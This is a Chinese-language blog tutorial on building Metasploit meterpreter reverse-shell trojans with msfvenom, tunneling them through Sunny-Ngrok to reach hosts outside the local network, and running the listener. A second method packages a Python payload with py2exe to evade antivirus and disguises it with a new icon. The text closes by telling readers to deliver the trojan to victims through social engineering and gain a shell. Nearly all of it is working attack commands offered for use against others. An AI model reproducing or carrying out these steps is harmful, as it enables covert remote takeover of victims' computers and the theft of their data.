AI智能
改变未来

metasploit学习–联合Ngrok内网穿透生成木马远控主机


一、msf生成木马,联合Sunny-Ngrok进行内网穿透,远程控制外网主机

1.链接隧道

./sunny clientid 隧道id

2.生成木马

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=xxx.idcfengye.com LPORT=xxxx -f exe -o shell.exe

这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free,LPORT是你刚刚设置的隧道端口比如我的是10210,那么这里就填10210,对应版本的木马在前面更改一下就可以了。
注意:
-a x64位,一定要对应-p x64位。
简单点来说,生成的exe是64位的,最好是只在64位的电脑上去运行。
千万不要把生成32位的exe放到64位的电脑上去运行,那样会造成失败或内存、CPU很高的情况。
6.msf开启监听,使用模块

msf5> use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 127.0.0.1msf5 exploit(multi/handler) > set lport xxxxmsf5 exploit(multi/handler) > exploit

这里的端口是你设置的本地端口,我设置的是2333,那么就填2333,一切就绪就run
7.结果,获取成功

外网主机也可以获取

二、利用py2exe生成免杀木马

1.链接隧道

./sunny clientid 隧道id

2.生成木马

msfvenom -p python/meterpreter/reverse_tcp LHOST=xxx.idcfengye.com LPORT=xxx -f raw -o shell.py

这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free,LPORT是你刚刚设置的隧道端口比如我的是10210,那么这里就填10210,对应版本的木马在前面更改一下就可以了
3.新建一个setup.py文件,代码如下:

from distutils.core import setupimport py2exesetup(name = \'Meter\',description =  \'Python-based App\',version = \'1.0\',console = [\'shell.py\'],options = {\'py2exe\':{\'bundle_files\':1,\'packages\':\'ctypes\',\'includes\':\'base64,sys,socket,struct,time,code,platform,getpass,shutil\',}},zipfile = None,)

上面的console = [‘shell.py’] 里面是你刚刚生成py文件的名字

4.把setup.py和shell.py放在同一个文件夹,cmd进入路径,用pythoon py2exe模块进行封装生成可执行程序

python ./setup.py py2exe


5.生成完成之后,找到执行文件,可以替换图标实现伪装效果

6.查看免杀效果,基本上主流杀软都不报毒


6.msf开启监听

msf5> use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 127.0.0.1msf5 exploit(multi/handler) > set lport xxxxmsf5 exploit(multi/handler) > exploit

这里的端口是你设置的本地端口,我设置的是2333,那么就填2333,一切就绪就run

7.通过社工等手段,发送给受害人,执行打开,即可获取shell

赞(0) 打赏
未经允许不得转载:爱站程序员基地 » metasploit学习–联合Ngrok内网穿透生成木马远控主机